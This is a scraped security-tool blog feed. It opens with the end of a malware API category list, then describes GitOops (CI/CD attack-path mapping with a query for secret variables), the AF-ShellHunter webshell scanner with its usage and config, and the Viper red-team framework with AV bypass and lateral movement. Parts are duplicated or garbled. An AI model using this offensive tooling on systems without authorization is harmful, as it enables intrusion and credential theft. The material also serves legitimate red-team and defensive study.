  • Changing registry keys and logs.

File

This category contains functions and strings about:

  • Creating/modifying/infecting/deleting files.
  • Getting information about file contents and filesystems.

Networking/Web

This category contains functions and strings about:

  • Communicating with malicious hosts.
  • Downloading malicious files.
  • Sending informations about infected machine and its user.

Process

This category contains functions and strings about:

  • Creating/infecting/terminating processes.
  • Manipulating processes.

Dll/Resource Handling

This category contains functions and strings about:

  • Handling DLL files and another malware's resource files.
  • Infecting and manipulating DLL files.

Evasion/Bypassing

This category contains functions and strings about:

  • Manipulating Windows security policies and bypassing restrictions.
  • Detecting debuggers and doing evasive tricks.

System/Persistence

This category contains functions and strings about:

  • Executing system commands.
  • Manipulating system files and system options to get persistence in target systems.

COMObject

This category contains functions and strings about:

  • Microsoft's Component Object Model system.

Cryptography

This category contains functions and strings about:

  • Encrypting and decrypting files.
  • Creating and destroying hashes.

Information Gathering

This category contains functions and strings about:

  • Gathering informations from target hosts like process states, network devices etc.

Keyboard/Keylogging

This category contains functions and strings about:

  • Tracking infected machine's keyboard.
  • Gathering information about targets keyboard.
  • Managing input methods etc.

Memory Management

This category contains functions and strings about:

  • Manipulating and using target machines memory.


GitOops - All Paths Lead To Clouds

9 October 2021 at 20:30
By: Zion3R


GitOops is a tool to help attackers and defenders identify lateral movement and privilege escalation paths in GitHub organizations by abusing CI/CD pipelines and GitHub access controls.


It works by mapping relationships between a GitHub organization and its CI/CD jobs and environment variables. It'll use any Bolt-compatible graph database as backend, so you can query your attack paths with openCypher:

MATCH p=(:User{login:"alice"})-[*..5]->(v:EnvironmentVariable)
WHERE v.name =~ ".*SECRET.*"
RETURN p


GitOops takes inspiration from tools like Bloodhound and Cartography.

Check out the docs and more example queries.



AF-ShellHunter - Auto Shell Lookup

9 October 2021 at 11:30
By: Zion3R


AF-ShellHunter: Auto shell lookup

AF-ShellHunter its a script designed to automate the search of WebShell's in AF Team


How to

pip3 install -r requirements.txt
python3 shellhunter.py --help


Basic Usage

You can run shellhunter in two modes

  • --url -u When scanning a single url
  • --file -f Scanning multiple URLs at once

Example searching webshell with burpsuite proxy, hiding string "404" with a size between 100 and 1000 chars

โ”Œโ”€โ”€(blueudpใ‰ฟxxxxxxxx)-[~/AF-ShellHunter]
โ””โ”€$ python3 shellhunter.py -u https://xxxxxxxxxx -hs "404" -p burp --greater-than 100 --smaller-than 1000
Running AF-Team ShellHunt 1.1.0

URL: https://xxxxxxxxxx
Showing only: 200, 302
Threads: 20
Not showing coincidence with: 404
Proxy: burp
Greater than: 100
Smaller than: 1000
Found https://xxxxxxxxxx/system.php len: 881


File configuration for multiple sites

phishing_list

en mantenimiento' with size between 100 and 1000 chars [burp] https://banco.phishing->show-response-code "302" "200", not show-string "pรกgina en mantenimiento", greater-than 100, smaller-than 1000 [noproxy] banco.es-> # ShellHunt will add 'http:// ">
# How to?
# set country block with [country], please read user_files/config.txt

# 'show-response-code "option1" "option2"' -> show responses with those status codes, as -sc
# 'show-string' -> show match with that string, as -ss
# 'show-regex' -> show match with regex, as -sr

# use 'not' for not showing X in above options, as -h[option]

# 'greater-than' -> Show response greater than X, as -gt ( --greater-than )
# 'smaller-than' -> Show responses smaller than X, as -st ( --smaller-than )


# Example searching webshell with BurpSuite proxy. 302, 200 status code, not showing results w/ 'pรกgina en mantenimiento' with size between 100 and 1000 chars

[burp]
https://banco.phishing->show-response-code "302" "200", not show-string "pรกgina en mantenimiento", greater-than 100, smaller-than 1000

[noproxy]
banco.es-> # ShellHunt will add 'http://

Setting your proxies and custom headers

config.txt

Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36 Referer? bit.ly/THIS_is_PHISHING # Bypass referer protection [PROXIES] burp? https://127.0.0.1:8080,http://127.0.0.1:8080 ">
[HEADERS]  # REQUESTS CUSTOM HEADERS, ADD 'OPTION: VALUE'
User-Agent? Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36
Referer? bit.ly/THIS_is_PHISHING # Bypass referer protection

[PROXIES]
burp? https://127.0.0.1:8080,http://127.0.0.1:8080

Other features
  1. Filter by regex
  2. Filter by string
  3. Filter by HTTP Status code
  4. Filter by length
  5. Custom Headers
  6. Custom proxy or proxy block for URL file
  7. Multithreading ( custom workers number )
                                                              .-"; ! ;"-.
----. .'! : | : !`.
" _} /\ ! : ! : ! /\
"@ > /\ | ! :|: ! | /\
|\ 7 ( \ \ ; :!: ; / / )
/ `-- ( `. \ | !:|:! | / .' )
,-------,**** (`. \ \ \!:|:!/ / / .')
~ >o< \---------o{___}- => \ `.`.\ |!|! |/,'.' /
/ | \ / ________/8' `._`.\\\!!!// .'_.'
| | / " `.`.\\|//.'.'
| / | |`._`n'_.'|
"----^----"


Viper - Intranet Pentesting Tool With Webui

8 October 2021 at 20:30
By: Zion3R


  • Viper is a graphical intranet penetration tool, which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration
  • Viper integrates basic functions such as bypass anti-virus software, intranet tunnel, file management, command line and so on
  • Viper has integrated 80+ modules, covering Resource Development / Initial Access / Execution / Persistence / Privilege Escalation / Defense Evasion / Credential Access / Discovery / Lateral Movement / Collection and other categories
  • Viper's goal is to help red team engineers improve attack efficiency, simplify operation and reduce technical threshold
  • Viper supports running native msfconsole in browser and multi - person collaboration






Website

Installation manual

FAQ

Issues

Modules

System architecture diagram



Development Manual

Source Code
  • viperjs (Frontend)

https://github.com/FunnyWolf/viperjs

  • viperpython (Backend)

https://github.com/FunnyWolf/viperpython

  • vipermsf (MSFRPC)

https://github.com/FunnyWolf/vipermsf


Acknoladgement

Edward_Snowdeng exp Fnzer0qingyun00่„ธ่ฐฑ NoobFTW Somd5-ๅฐๅฎ‡ timwhitezViCrackxiaobei97yumusb



โŒ